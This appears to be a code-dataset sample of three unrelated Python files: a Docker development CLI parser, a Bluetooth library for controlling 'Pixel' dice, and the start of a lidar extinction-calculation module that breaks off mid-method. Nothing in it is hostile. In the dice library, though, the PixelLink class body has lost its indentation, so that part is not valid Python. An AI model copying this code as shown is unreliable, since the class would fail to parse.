    Returns data for all useful interfaces if no specific interface
    is provided, sorted by IP address.
    """
    if interface:
        interface_ips = get_ips_for_interface(interface)
    else:
        interface_ips = []
        for int_ in netifaces.interfaces():
            if int_ == 'vboxnet0':
                # Skip the Virtual Box interface because that's not publicly
                # accessible.
                continue
            interface_ips += get_ips_for_interface(int_)
    return sorted(interface_ips, key=lambda tup: tup[1])
def create_parser():
    """Build the argparse parser with one sub-parser per mkt verb.

    Each sub-parser stores its implementation function in the `func`
    default; the dispatcher then calls args.func(args, parser) (plus the
    raw argv tail for commands flagged with .argv, e.g. `up`).
    """
    parser = argparse.ArgumentParser()
    subparsers = parser.add_subparsers(
        help='See each command for additional help',
        title='Sub-commands', description='Valid commands'
    )
    parser_root = subparsers.add_parser(
        'root', help='Create or update the root paths in the fig.yml.'
    )
    parser_root.add_argument(
        'directory', help='Path to the marketplace repositories.',
        default=None, nargs='?'
    )
    parser_root.add_argument(
        '--buildfrom', help='Build locally or from docker hub',
        dest='build', action='store'
    )
    # Set the default to empty to allow "mkt root" to just print out the
    # root directory.
    parser_root.set_defaults(build=None)
    parser_root.set_defaults(func=root)
    parser_bash = subparsers.add_parser(
        'bash', help='Run a bash shell on a running container.'
    )
    parser_bash.add_argument(
        'project',
        help='Project name, if not given will be calculated.',
        default=None, nargs='?')
    parser_bash.set_defaults(func=bash)
    parser_update = subparsers.add_parser(
        'update', help='Runs git pull on each repo and any migrations.'
    )
    parser_update.add_argument(
        '--git', help='Runs git pull', action='store_true')
    parser_update.add_argument(
        '--migrations', help='Runs migrations', action='store_true')
    parser_update.set_defaults(func=update)
    parser_check = subparsers.add_parser(
        'check', help='Basic health checks of the system.'
    )
    parser_check.add_argument(
        '--services', help='Checks the status page of each service.',
        action='store_true'
    )
    parser_check.add_argument(
        '--requirements', help='Checks the container requirements vs current'
                               ' requirements',
        action='store_true'
    )
    parser_check.add_argument(
        '--versions', help='Checks versions of docker, boot2docker and fig',
        action='store_true'
    )
    parser_check.set_defaults(func=check)
    parser_up = subparsers.add_parser(
        'up', help='Recreates fig.yml and starts the '
                   'containers in the background, a wrapper around `fig up`'
    )
    parser_up.set_defaults(func=up)
    parser_checkgitconfig = subparsers.add_parser(
        'chkgitconfig', help='Print out the git config for mkt branches'
    )
    parser_checkgitconfig.set_defaults(func=check_git_config)
    parser_revs = subparsers.add_parser(
        'revs', help='Print out the git revs for the trees'
    )
    parser_revs.set_defaults(func=revs)
    parser_whoami = subparsers.add_parser(
        'whoami', help='Check or store your github credentials'
    )
    parser_whoami.add_argument(
        'github_username', help='Your github username e.g. "jrrtolkien"',
        metavar="USER_NAME", default=None, nargs='?'
    )
    parser_whoami.set_defaults(func=whoami)
    parser_checkout = subparsers.add_parser(
        'checkout', help='Checkout your forks of sourcecode'
    )
    parser_checkout.add_argument(
        '--moz_remote_name',
        help='What to call the mozilla repo remote for this project. '
             'Following github terminology this defaults to "upstream"',
        metavar="MOZ_REMOTE_NAME",
        default='upstream', nargs='?'
    )
    parser_checkout.add_argument(
        '--fork_remote_name',
        help='What to call your fork remote for this project. Following '
             'github terminology this defaults to "origin"',
        metavar="FORK_REMOTE_NAME", default='origin', nargs='?'
    )
    parser_checkout.set_defaults(func=checkout)
    parser_bind = subparsers.add_parser(
        'bind', help='Bind the mp.dev domain to your public IP on '
                     'a Firefox OS device. Your public ID must be a proxy to '
                     'your internal Docker IP.'
    )
    parser_bind.add_argument(
        '--bind_ip',
        help='Public IP to bind to. If empty, the IP will be discovered.')
    parser_bind.add_argument(
        '--bind_host', default='mp.dev',
        help='Hostname to bind your IP too. Default: %(default)s')
    parser_bind.add_argument(
        '--bind_int',
        help='Network interface to guess a public IP from. Example: en0',
        default=None)
    parser_bind.add_argument(
        '--interfaces',
        help='Show network interfaces but do not bind anything.',
        action='store_true')
    parser_bind.set_defaults(func=bind)
    parser.add_argument('--version', action='version', version=__version__)
    # Setup the logging for fig.
    main.setup_logging()
    return parser
|
<filename>pixels.py
# Utility classes to communicate with pixels dices
# Standard lib
from enum import IntEnum, unique
import time
import asyncio
import threading
import traceback
import sys
import signal
from queue import Queue
# Our types
from utils import integer_to_bytes, Event
from color import Color32
from animation import AnimationSet
# We're using the bluepy lib for easy bluetooth access
# https://github.com/IanHarvey/bluepy
from bluepy.btle import Scanner, ScanEntry, Peripheral, DefaultDelegate
# Known issues:
# hci0 needs occasional reset
# devices = Scanner().scan(timeout_secs)
# File "/home/pi/.local/lib/python3.7/site-packages/bluepy/btle.py", line 854, in scan
# self.stop()
# File "/home/pi/.local/lib/python3.7/site-packages/bluepy/btle.py", line 803, in stop
# self._mgmtCmd(self._cmd()+"end")
# File "/home/pi/.local/lib/python3.7/site-packages/bluepy/btle.py", line 312, in _mgmtCmd
# raise BTLEManagementError("Failed to execute management command '%s'" % (cmd), rsp)
# bluepy.btle.BTLEManagementError: Failed to execute management command 'scanend' (code: 11, error: Rejected)
# https://github.com/zewelor/bt-mqtt-gateway/issues/59
# > sudo hciconfig hci0 reset
@unique
class DiceType(IntEnum):
    """Supported Pixel dices types"""
    # Leading underscores because "None" is a keyword and identifiers
    # cannot start with a digit.
    _None = 0
    _6 = 1
    _20 = 2
@unique
class MessageType(IntEnum):
    """Pixel dices Bluetooth messages identifiers"""
    # NOTE(review): values presumably mirror the die firmware's protocol
    # enum — keep the numbering in sync with the firmware; do not renumber.
    _None = 0
    WhoAreYou = 1
    IAmADie = 2
    State = 3
    Telemetry = 4
    BulkSetup = 5
    BulkSetupAck = 6
    BulkData = 7
    BulkDataAck = 8
    TransferAnimSet = 9
    TransferAnimSetAck = 10
    TransferSettings = 11
    TransferSettingsAck = 12
    DebugLog = 13
    PlayAnim = 14
    PlayAnimEvent = 15
    StopAnim = 16
    RequestState = 17
    RequestAnimSet = 18
    RequestSettings = 19
    RequestTelemetry = 20
    ProgramDefaultAnimSet = 21
    ProgramDefaultAnimSetFinished = 22
    Flash = 23
    FlashFinished = 24
    RequestDefaultAnimSetColor = 25
    DefaultAnimSetColor = 26
    RequestBatteryLevel = 27
    BatteryLevel = 28
    Calibrate = 29
    CalibrateFace = 30
    NotifyUser = 31
    NotifyUserAck = 32
    TestHardware = 33
    SetStandardState = 34
    SetLEDAnimState = 35
    SetBattleState = 36
    ProgramDefaultParameters = 37
    ProgramDefaultParametersFinished = 38
    # TESTING
    SetAllLEDsToColor = 41
    AttractMode = 42
    PrintNormals = 43
    PrintA2DReadings = 44
    LightUpFace = 45
    SetLEDToColor = 46
    Count = 47
class PixelLink:
"""
Connection to a specific Pixel dice over Bluetooth
This class is not thread safe (because bluepy.btle.Peripheral is not)
"""
# Pixels Bluetooth constants
PIXELS_SERVICE_UUID = "6E400001-B5A3-F393-E0A9-E50E24DCCA9E".lower()
PIXELS_SUBSCRIBE_CHARACTERISTIC = "6E400001-B5A3-F393-E0A9-E50E24DCCA9E".lower()
PIXELS_WRITE_CHARACTERISTIC = "6E400002-B5A3-F393-E0A9-E50E24DCCA9E".lower()
# We're limited to a 20-byte packet size because the Raspberry Pi Model 3B uses Bluetooth 4.1,
# so we're stuck making sure our BulkData packet fits in the 20 bytes, i.e. 16 bytes of payload
PIXELS_MESSAGE_BULK_DATA_SIZE = 16
# Default timeout in seconds used for waiting on a dice message
DEFAULT_TIMEOUT = 3
# Set to true to print messages content
_trace = False
_devices = []
@staticmethod
def _get_continue():
    """Wait for a single keypress; True when it was Enter (carriage return)."""
    # Imported lazily — presumably so the module loads without the getch
    # package / a TTY present; TODO confirm.
    from getch import getch
    return getch() == '\r'
""" Use one of the Pixels.connect_xxx() methods to create a valid Pixel object """
def __init__(self):
self._address = None
self._name = None
self._device = None
self._subscriber = None
self._writer = None
# Create the message map
self._message_map = {}
for i in range(MessageType.Count):
self._message_map[i] = []
# Setup events
self.face_up_changed = Event()
self.battery_voltage_changed = Event()
self._dtype = None
self._battery_voltage = -1
self._face_up = 0
@property
def name(self) -> str:
    """Advertised Bluetooth name of the die."""
    return self._name

@property
def address(self) -> str:
    """Bluetooth address of the die."""
    return self._address

@property
def dtype(self) -> DiceType:
    """Die type reported by the IAmADie message (None until received)."""
    return self._dtype

@property
def battery_voltage(self) -> float:
    """Battery voltage (usually between 2.5 and 4.2 volts)
    Associated event: battery_voltage_changed"""
    return self._battery_voltage

@property
def face_up(self) -> int:
    """Starts at 1, returns 0 if no face up
    Associated event: face_up_changed"""
    return self._face_up
async def _wait_until(self, condition, timeout):
    """Poll *condition* until it returns True or *timeout* seconds elapse.

    Raises asyncio.TimeoutError when the deadline passes (a subclass of
    Exception, so existing `except Exception` callers still catch it).
    """
    start_time = time.perf_counter()
    end_time = start_time + timeout
    t = start_time
    while (not condition()) and (t < end_time):
        # Yield to the event loop between polls. The original combined
        # `await asyncio.sleep(0)` with a blocking time.sleep(0.001),
        # which stalled every other coroutine for 1 ms per iteration.
        await asyncio.sleep(0.001)
        t = time.perf_counter()
    if not condition():
        raise asyncio.TimeoutError("Timeout while waiting for condition")
def _send(self, message_type: MessageType, *args):
    """Send a message to the die, tracing the payload bytes when enabled."""
    if PixelLink._trace:
        print(f'{self.name} <= {message_type.name}: {", ".join([format(i, "02x") for i in args])}')
    # Pixels (a module-level manager defined elsewhere) owns the actual
    # Bluetooth write.
    Pixels.send_data(self, message_type, *args)
async def _send_and_ack(self, msg_type: MessageType, msg_data, ack_type: MessageType, timeout = DEFAULT_TIMEOUT):
    """Send a message and wait for its acknowledgement.

    Registers a temporary handler for *ack_type*, sends the message, and
    waits up to *timeout* seconds for a matching ack; the handler is
    always unregistered afterwards. Returns the ack message bytes.
    """
    assert(timeout >= 0)  # NOTE(review): assert is stripped under -O
    self._send(msg_type, *msg_data)
    ack_msg = None
    # The first parameter is the PixelLink instance because
    # _process_message invokes handlers as handler(self, msg).
    def on_message(self, msg):
        nonlocal ack_msg
        if not ack_msg and msg[0] == ack_type:
            ack_msg = msg
    self._message_map[ack_type].append(on_message)
    try:
        await self._wait_until(lambda: ack_msg != None, timeout)
    finally:
        self._message_map[ack_type].remove(on_message)
    return ack_msg
def _process_message(self, msg):
    """Processes a message coming from the device and routes it to the proper message handlers."""
    if PixelLink._trace:
        print(f'{self.name} => {MessageType(msg[0]).name}: {", ".join([format(i, "02x") for i in msg[1:]])}')
    # Robustness: an unknown message id used to return None here, making
    # the for-loop below raise TypeError; default to an empty list.
    handlers = self._message_map.get(msg[0], [])
    for handler in handlers:
        if handler is not None:
            # Pass the message to the handler
            handler(self, msg)
def _die_type_handler(self, msg):
    """IAmADie: byte 1 carries the die type."""
    self._dtype = DiceType(msg[1])

def _debug_log_handler(self, msg):
    """DebugLog: print the NUL-terminated UTF-8 string from the payload."""
    endl = msg[1:].index(0) + 1  # find index of string terminator
    print(f'DEBUG[{self.address}]: {bytes(msg[1:endl]).decode("utf-8")}')
def _battery_level_handler(self, msg):
    """BatteryLevel: payload is a little-endian 32-bit float voltage.

    Updates _battery_voltage and fires battery_voltage_changed when the
    value actually changed.
    """
    import struct
    # BUG FIX: struct.unpack returns a tuple; the original stored the
    # 1-tuple itself, so battery_voltage was a tuple, never a float, and
    # the != comparison against the previous float always fired.
    (voltage,) = struct.unpack('<f', bytes(msg[1:]))  # little endian
    #print(f'Battery voltage: {voltage}')
    if self._battery_voltage != voltage:
        self._battery_voltage = voltage
        self.battery_voltage_changed.notify(voltage)
def _state_handler(self, msg):
    """State: byte 1 is the roll state, byte 2 the 0-based face index.

    Publishes face_up_changed with the 1-based face number, or 0 when no
    face is up (state != 1).
    """
    state = msg[1]
    face = msg[2]
    #print(f'Face {face + 1} state {state}')
    face = face + 1 if state == 1 else 0
    if self._face_up != face:
        self._face_up = face
        self.face_up_changed.notify(face)
def _notify_user_handler(self, msg):
    """Handle a NotifyUser message: prompt the user on the console and ack the die.

    Payload layout: timeout (seconds), ok flag, cancel flag, then UTF-8 text.
    Blocks on console input via PixelLink._get_continue().
    Returns True when the user chose to continue, False otherwise.
    """
    assert(msg[0] == MessageType.NotifyUser)
    timeout, ok, cancel = msg[1:4]
    txt = bytes(msg[4:]).decode("utf-8")
    # The prompt can only be aborted when the die offers both OK and Cancel.
    can_abort = ok and cancel
    txt_key = 'Enter to continue, any other key to abort' if can_abort else 'Any key to continue'
    print(f'{txt} [{txt_key}, timeout {timeout}s]:')
    ok = PixelLink._get_continue()
    if not can_abort:
        # Non-abortable prompts always acknowledge positively.
        ok = True
    print("Continuing" if ok else "Aborting")
    self._send(MessageType.NotifyUserAck, 1 if ok else 0)
    return ok
async def _upload_bulk_data(self, data: bytes, progress_callback, timeout = DEFAULT_TIMEOUT):
    """Upload a data blob to the die using the bulk-transfer protocol.

    Sends a BulkSetup message with the total size, then streams the data in
    chunks of at most PIXELS_MESSAGE_BULK_DATA_SIZE bytes, waiting for an ack
    after each chunk.

    Args:
        data: payload to transfer (must be non-empty).
        progress_callback: optional callable(bytes_sent, total_size), or None.
        timeout: per-message ack timeout in seconds.
    """
    assert(len(data))
    assert(timeout >= 0)
    # Send setup message
    await self._send_and_ack(MessageType.BulkSetup, integer_to_bytes(len(data), 2), MessageType.BulkSetupAck, timeout)
    # Then transfer data
    total_size = len(data)
    remaining_size = total_size
    offset = 0
    while remaining_size > 0:
        size = min(remaining_size, PixelLink.PIXELS_MESSAGE_BULK_DATA_SIZE)
        header = [size] + integer_to_bytes(offset, 2)
        # Convert the bytes slice to a list: concatenating the list header with
        # a raw bytes slice raises TypeError (list + bytes is not defined).
        chunk = list(data[offset:offset + size])
        await self._send_and_ack(MessageType.BulkData, header + chunk, MessageType.BulkDataAck, timeout)
        if progress_callback is not None:
            progress_callback(offset, total_size)
        remaining_size -= size
        offset += size
async def upload_animation_set(self, anim_set: AnimationSet, timeout = DEFAULT_TIMEOUT):
    """Upload a full animation set to the die.

    First sends a TransferAnimSet message describing the element counts, then
    bulk-transfers the packed animation data, printing progress roughly every 10%.
    """
    data = []
    def append(dword):
        # Serialize each value as 2 bytes into the header payload.
        data.extend(integer_to_bytes(dword, 2))
    append(len(anim_set.palette))
    append(len(anim_set.keyframes))
    append(len(anim_set.rgb_tracks))
    append(len(anim_set.tracks))
    append(len(anim_set.animations))
    append(anim_set.heat_track_index)
    update_percent_increment = 0.1
    next_update_percent = update_percent_increment
    def print_progress(progress, total):
        # Throttled progress reporting for the bulk transfer.
        # NOTE(review): the nonlocal on update_percent_increment is unnecessary
        # (it is only read, never assigned) but harmless.
        nonlocal update_percent_increment
        nonlocal next_update_percent
        percent = progress / total
        if percent > next_update_percent:
            print(f"Uploading animation: {percent * 100:.2f}% complete")
            next_update_percent += update_percent_increment
    await self._send_and_ack(MessageType.TransferAnimSet, data, MessageType.TransferAnimSetAck, timeout)
    await self._upload_bulk_data(anim_set.pack(), print_progress, timeout)
def await_upload_animation_set(self, anim_set: AnimationSet, timeout = DEFAULT_TIMEOUT):
    """Synchronous wrapper: run upload_animation_set to completion and return its result."""
    coroutine = self.upload_animation_set(anim_set, timeout)
    return asyncio.run(coroutine)
async def refresh_battery_voltage(self, timeout = DEFAULT_TIMEOUT):
    """Ask the die for its battery level, wait for the answer, return the cached voltage."""
    await self._send_and_ack(MessageType.RequestBatteryLevel, [], MessageType.BatteryLevel, timeout)
    return self.battery_voltage
def await_refresh_battery_voltage(self, timeout = DEFAULT_TIMEOUT):
    """Synchronous wrapper: refresh the battery voltage and return it."""
    coroutine = self.refresh_battery_voltage(timeout)
    return asyncio.run(coroutine)
async def refresh_state(self, timeout = DEFAULT_TIMEOUT):
    """Ask the die for its current state (face up) and wait for the answer."""
    await self._send_and_ack(MessageType.RequestState, [], MessageType.State, timeout)
def await_refresh_state(self, timeout = DEFAULT_TIMEOUT):
    """Synchronous wrapper: refresh the die state and return when done."""
    coroutine = self.refresh_state(timeout)
    return asyncio.run(coroutine)
def request_telemetry(self, activate):
    """Turn the die's telemetry stream on (truthy *activate*) or off."""
    self._send(MessageType.RequestTelemetry, 1 if activate else 0)
def play(self, index, remap_face = 0, loop = 0):
    """Play the animation at *index*, optionally remapped to a face and/or looped."""
    self._send(MessageType.PlayAnim, index, remap_face, loop)
def stop(self, index, remap_face = 0):
    """Stop the animation at *index* (same face remapping as used to play it)."""
    self._send(MessageType.StopAnim, index, remap_face)
def play_event(self, event, remap_face = 0, loop = 0):
    """Play the animation associated with *event*, optionally remapped and/or looped."""
    self._send(MessageType.PlayAnimEvent, event, remap_face, loop)
def force_LEDs_color(self, color: Color32):
    """Force every LED on the die to the given color."""
    rgb_bytes = integer_to_bytes(color.to_rgb(), 4)
    self._send(MessageType.SetAllLEDsToColor, *rgb_bytes)
def force_LED_color(self, ledIndex, color: Color32):
    """Set a single LED to the given color. Led index starts at 0."""
    payload = integer_to_bytes(ledIndex, 1) + integer_to_bytes(color.to_rgb(), 4)
    self._send(MessageType.SetLEDToColor, *payload)
def start_calibration(self):
    """Put the die into its calibration sequence."""
    self._send(MessageType.Calibrate)
def print_a2d_levels(self):
    """Ask the die to print its analog-to-digital readings (debug helper)."""
    self._send(MessageType.PrintA2DReadings)
def light_up_face(self, face, color: Color32, remapFace = 0, layoutIndex = 255, remapRot = 255):
    """Light up a single face of the die with the given color.

    face, remapFace, layoutIndex and remapRot are sent as single bytes,
    followed by the 4-byte RGB color value.
    """
    payload = []
    for byte_value in (face, remapFace, layoutIndex, remapRot):
        payload.extend(integer_to_bytes(byte_value, 1))
    payload.extend(integer_to_bytes(color.to_rgb(), 4))
    self._send(MessageType.LightUpFace, *payload)
def set_led_anim_state(self):
    """Send a SetLEDAnimState message to the die."""
    self._send(MessageType.SetLEDAnimState)
class Pixels:
    """ Manages multiple pixels at once. Also supports the interactive mode """
    @unique
    class Command(IntEnum):
        # Commands consumed by the BLE worker thread (see _main).
        _None = 0
        AddPixel = 1
        RemovePixel = 2
        SendMessage = 3
        TerminateThread = 4
    # Queue of [Command, ...] lists handed to the BLE worker thread.
    command_queue = Queue()
    # PixelLink instances currently connected.
    connected_pixels = []
    # ScanEntry objects found by the last BLE scan.
    available_pixels = []
    DEFAULT_SCAN_TIMEOUT = 3
    @staticmethod
    def enumerate_pixels(timeout = DEFAULT_SCAN_TIMEOUT):
        """Returns a list of Pixel dices discovered over Bluetooth"""
        print(f"Scanning BLE devices...")
        scanned_devices = Scanner().scan(timeout)
        Pixels.available_pixels.clear()
        for dev in scanned_devices:
            #print(f'Device {dev.addr} ({dev.addrType}), RSSI={dev.rssi} dB')
            # Only keep devices advertising the Pixels service UUID.
            if dev.getValueText(7) == PixelLink.PIXELS_SERVICE_UUID:
                # Grab full name if possible, otherwise short name
                name = dev.getValueText(9) or dev.getValueText(8)
                Pixels.available_pixels.append(dev)
                print(f"Discovered Pixel {name}")
        return Pixels.available_pixels
    @staticmethod
    async def connect_by_name(pixel_name):
        """Connects to a single pixel, by name.
        This is a coroutine because connecting to the dice takes time."""
        for dev in Pixels.available_pixels:
            # Grab full name if possible, otherwise short name
            name = dev.getValueText(9) or dev.getValueText(8)
            if name == pixel_name:
                return await Pixels.connect_pixel(dev)
        raise Exception(f"Could not find pixel named {pixel_name}")
        # NOTE(review): unreachable -- the raise above always fires first.
        return None
    @staticmethod
    def await_connect_by_name(pixel_name):
        """Connects to a single pixel, by name."""
        return asyncio.run(Pixels.connect_by_name(pixel_name))
    @staticmethod
    async def connect_pixel(entry: ScanEntry) -> PixelLink:
        """Connect to a scanned device and initialize the PixelLink for it.

        Returns the connected PixelLink, or None when the connection failed.
        """
        assert entry != None
        dice = PixelLink()
        finished = False
        def assigning_dev(ret_dev):
            # Callback run by the BLE thread once the connection attempt finished.
            nonlocal finished
            finished = True
        # Get the BLE thread to connect to the device. We do this so the native code helper is attached to the BLE thread, not this one
        Pixels.command_queue.put([Pixels.Command.AddPixel, entry, dice, assigning_dev])
        while not finished:
            await asyncio.sleep(0)
        if dice._device != None:
            # register default message handlers
            dice._message_map[MessageType.IAmADie].append(PixelLink._die_type_handler)
            dice._message_map[MessageType.DebugLog].append(PixelLink._debug_log_handler)
            dice._message_map[MessageType.BatteryLevel].append(PixelLink._battery_level_handler)
            dice._message_map[MessageType.State].append(PixelLink._state_handler)
            dice._message_map[MessageType.NotifyUser].append(PixelLink._notify_user_handler)
            # Check type
            dice._dtype = None
            dice._send(MessageType.WhoAreYou)
            await dice._wait_until(lambda : dice._dtype != None, 10)
            if not dice._dtype:
                raise Exception("Pixel type couldn't be identified")
            # Battery level
            dice._battery_voltage = -1
            await dice.refresh_battery_voltage()
            # Face up (0 means no face up)
            dice._face_up = 0
            await dice.refresh_state()
            print(f"Dice {dice.name} connected")
            return dice
        else:
            return None
    @staticmethod
    def remove_pixel(pixel: PixelLink):
        # Ask the BLE thread to disconnect and forget this pixel.
        Pixels.command_queue.put([Pixels.Command.RemovePixel, pixel])
    @staticmethod
    def send_data(pixel: PixelLink, message_type: MessageType, *args):
        # Queue a raw message for the BLE thread to write to the device.
        Pixels.command_queue.put([Pixels.Command.SendMessage, pixel, message_type, *args])
    @staticmethod
    def _main():
        """BLE worker thread loop: processes queued commands and polls notifications."""
        while True:
            # process queue of messages
            while Pixels.command_queue.qsize() > 0:
                cmd = Pixels.command_queue.get(False)
                if cmd[0] == Pixels.Command.AddPixel:
                    # extract parameters
                    bluepy_entry = cmd[1]
                    pixel = cmd[2]
                    # create the device
                    # pixel = PixelLink()
                    pixel._address = bluepy_entry.addr
                    pixel._name = bluepy_entry.getValueText(9) or bluepy_entry.getValueText(8)
                    pixel._device = Peripheral(bluepy_entry.addr, bluepy_entry.addrType)
                    print(f"Connecting to dice {pixel._name} at address {pixel._address}")
                    try:
                        # Get connected_pixels service
                        service = pixel._device.getServiceByUUID(PixelLink.PIXELS_SERVICE_UUID)
                        if not service:
                            raise Exception('Pixel service not found')
                        # Get the subscriber and writer for exchanging data with the dice
                        pixel._subscriber = service.getCharacteristics(PixelLink.PIXELS_SUBSCRIBE_CHARACTERISTIC)[0]
                        pixel._writer = service.getCharacteristics(PixelLink.PIXELS_WRITE_CHARACTERISTIC)[0]
                        # This magic code enables notifications from the subscribe characteristic,
                        # which in turn keeps the firmware on the dice from erroring out because
                        # it thinks it can't send notifications. Note that firmware code has also been
                        # fixed so it won't crash as a result :)
                        # There is an example at the bottom of the file of notifications working
                        pixel._device.writeCharacteristic(pixel._subscriber.valHandle + 1, b'\x01\x00')
                        # Bluepy notification delegate
                        class ProcessMessageDelegate(DefaultDelegate):
                            def handleNotification(self, cHandle, data):
                                pixel._process_message(list(data))
                        pixel._device.withDelegate(ProcessMessageDelegate())
                    except:
                        # Broad on purpose: always disconnect cleanly, then re-raise.
                        pixel._device.disconnect()
                        pixel._device = None
                        raise
                    # store the pixel
                    Pixels.connected_pixels.append(pixel)
                    # notify calling code
                    cmd[3](pixel._device)
                elif cmd[0] == Pixels.Command.RemovePixel:
                    pixel = cmd[1]
                    Pixels.connected_pixels.remove(pixel)
                    pixel._device.disconnect()
                elif cmd[0] == Pixels.Command.SendMessage:
                    pixel = cmd[1]
                    data = bytes(cmd[2:])
                    pixel._writer.write(data)
                elif cmd[0] == Pixels.Command.TerminateThread:
                    # close all connections
                    for pixel in Pixels.connected_pixels:
                        pixel._device.disconnect()
                    Pixels.connected_pixels.clear()
                    return
            # poll BLE stacks
            for pixel in Pixels.connected_pixels:
                pixel._device.waitForNotifications(0.0001) # 0 seems to cause issues
            # wait before looping again
            time.sleep(0.0001)
    @staticmethod
    def start():
        """Install a Ctrl-C handler, launch the BLE worker thread and run a scan."""
        # install signal handler
        def signal_handler(signal, frame):
            Pixels.terminate()
            sys.exit(0)
        signal.signal(signal.SIGINT, signal_handler)
        # kick off thread
        t = threading.Thread(target=Pixels._main)
        t.start()
        # start a scan!
        Pixels.enumerate_pixels()
    @staticmethod
    def terminate():
        """Ask the BLE worker thread to disconnect everything and exit."""
        Pixels.command_queue.put([Pixels.Command.TerminateThread])
    @staticmethod
    def is_in_interpreter():
        """Return a truthy value when running inside an interactive interpreter.

        NOTE(review): returns sys.ps1 (a string) when interactive rather than a
        strict bool -- callers only use it in a boolean context.
        """
        interpreter = False
        try:
            interpreter = sys.ps1
        except AttributeError:
            interpreter = sys.flags.interactive
        return interpreter
# Module-level scratch state used by the example main() below.
pixels = []
color = Color32(255, 255, 0)
async def main():
    """Example entry point: start the BLE thread and scan for dice.

    The commented-out lines below show typical usage (connecting by name,
    uploading an animation set, querying the battery voltage).
    """
    Pixels.start()
    # pixels.append(await Pixels.connect_by_name("D_71"))
    # await pixels[0].refresh_battery_voltage()
    # dice2 = await PixelLink.connect_dice("D_55")
    # connected_pixels.append(dice2)
    # color = Color32(255, 255, 0)
    # dice2.light_up_face(0, color)
    #await dice1.refresh_battery_voltage()
    #pixels.append(await Pixels.connect_by_name("D_48674010"))
    #pixels.append(await Pixels.connect_by_name("D_71902510"))
    #await pixels[0].upload_animation_set(AnimationSet.from_json_file('D20_animation_set.json'))
    # await dice2.refresh_battery_voltage()
    # If we're in the interactive interpreter, don't terminate the BLE thread, use Ctrl-C instead
    # this way messages are still processed
    if not Pixels.is_in_interpreter():
        Pixels.terminate()
if __name__ == "__main__":
    asyncio.run(main())
|
# -*- coding: utf-8 -*-
"""Classes for extinction calculation"""
from addict import Dict
from copy import deepcopy
from ELDAmwl.bases.factory import BaseOperation
from ELDAmwl.bases.factory import BaseOperationFactory
from ELDAmwl.component.interface import IExtOp
from ELDAmwl.component.interface import IMonteCarlo
from ELDAmwl.component.registry import registry
from ELDAmwl.extinction.product import Extinctions
from ELDAmwl.extinction.tools.operation import ExtinctionAutosmooth
from ELDAmwl.extinction.tools.operation import SignalSlope
from ELDAmwl.extinction.tools.operation import SlopeToExtinction
from ELDAmwl.utils.constants import ABOVE_MAX_ALT
from ELDAmwl.utils.constants import BELOW_OVL
from ELDAmwl.utils.constants import MC
from ELDAmwl.utils.constants import NC_FILL_INT
from ELDAmwl.utils.constants import NC_FILL_STR
import numpy as np
import zope
class CalcExtinction(BaseOperationFactory):
    """
    creates a class for the calculation of an extinction coefficient

    Returns an instance of BaseOperation which calculates the particle
    extinction coefficient from a Raman signal. In this case, it
    will be always an instance of CalcExtinctionDefault().

    Keyword Args:
        ext_params (:class:`ELDAmwl.extinction.params.ExtinctionParams`): \
                retrieval parameter of the extinction product
        slope_routine (:class:`ELDAmwl.bases.factory.BaseOperation`):
                result of :class:`ELDAmwl.extinction.tools.operation.SignalSlope`
        slope_to_ext_routine (:class:`ELDAmwl.bases.factory.BaseOperation`):
                result of :class:`ELDAmwl.extinction.tools.operation.SlopeToExtinction`
        raman_signal (:class:`ELDAmwl.signals.Signals`): Raman signal
        empty_ext (:class:`ELDAmwl.extinction.product.Extinctions`): \
                instance of Extinctions which has all meta data but profile data are empty arrays

    Returns:
        instance of :class:`ELDAmwl.bases.factory.BaseOperation`
    """
    name = 'CalcExtinction'
    def __call__(self, **kwargs):
        # All retrieval inputs are mandatory keyword arguments.
        for required in ('ext_params', 'slope_routine', 'slope_to_ext_routine',
                         'raman_signal', 'empty_ext'):
            assert required in kwargs
        return super(CalcExtinction, self).__call__(**kwargs)
    def get_classname_from_db(self):
        """
        return: always 'CalcExtinctionDefault' .
        """
        return 'CalcExtinctionDefault'
@zope.interface.implementer(IExtOp)
class CalcExtinctionDefault(BaseOperation):
    """
    Calculates particle extinction coefficient from Raman signal.

    The result is a copy of empty_ext, but its dataset (data, err, qf) is filled with the calculated values

    Keyword Args:
        ext_params (:class:`ELDAmwl.extinction.params.ExtinctionParams`): \
                retrieval parameter of the extinction product
        slope_routine (:class:`ELDAmwl.bases.factory.BaseOperation`):
                result of :class:`ELDAmwl.extinction.tools.operation.SignalSlope`
        slope_to_ext_routine (:class:`ELDAmwl.bases.factory.BaseOperation`):
                result of :class:`ELDAmwl.extinction.tools.operation.SlopeToExtinction`
        raman_signal (:class:`ELDAmwl.signals.Signals`): Raman signal
        empty_ext (:class:`ELDAmwl.extinction.product.Extinctions`): \
                instance of Extinctions which has all meta data but profile data are empty arrays

    Returns:
        profiles of particle extinction coefficients(:class:`ELDAmwl.extinction.product.Extinctions`)
    """
    name = 'CalcExtinctionDefault'
    # retrieval parameters of the extinction product
    ext_params = None
    # the Raman signal the slopes are derived from
    signal = None
    # operation that fits the signal slope inside a window
    slope_routine = None
    # operation that converts slopes into extinction coefficients
    slope_to_ext_routine = None
    # Extinctions instance receiving the calculated profiles
    result = None
    # numpy snapshots of the signal range / data / error / quality-flag arrays
    x_data = None
    y_data = None
    yerr_data = None
    qf_data = None
    def __init__(self, **kwargs):
        super(CalcExtinctionDefault, self).__init__(**kwargs)
        self.signal = self.kwargs['raman_signal']
        self.ext_params = self.kwargs['ext_params']
        self.slope_routine = self.kwargs['slope_routine']
        self.slope_to_ext_routine = self.kwargs['slope_to_ext_routine']
        # deepcopy so the caller's empty_ext is never modified in place
        self.result = deepcopy(self.kwargs['empty_ext'])
    def calc_slope(self, t, lev, window, half_win):
        """Fit the signal slope in a window centered on bin *lev* of time slice *t*.

        Writes slope, slope error, combined quality flag and the window size
        into the result dataset at (t, lev).
        """
        fb = lev - half_win  # first bin of the window
        lb = lev + half_win  # last bin of the window (inclusive)
        window_data = Dict({'x_data': self.x_data[t, fb:lb + 1],
                            'y_data': self.y_data[t, fb:lb + 1],
                            'yerr_data': self.yerr_data[t, fb:lb + 1],
                            })
        sig_slope = self.slope_routine.run(signal=window_data)
        # combine the quality flags of all bins in the window
        qf = np.bitwise_or.reduce(self.qf_data[t, fb:lb + 1])
        self.result.ds['data'][t, lev] = sig_slope.slope
        self.result.ds['err'][t, lev] = sig_slope.slope_err
        self.result.ds['qf'][t, lev] = qf
        self.result.ds['binres'][t, lev] = window
    def prepare_data(self, data):
        """Cache the signal profiles as plain numpy arrays for fast window slicing."""
        self.x_data = np.array(data.range)
        self.y_data = np.array(data.ds.data)
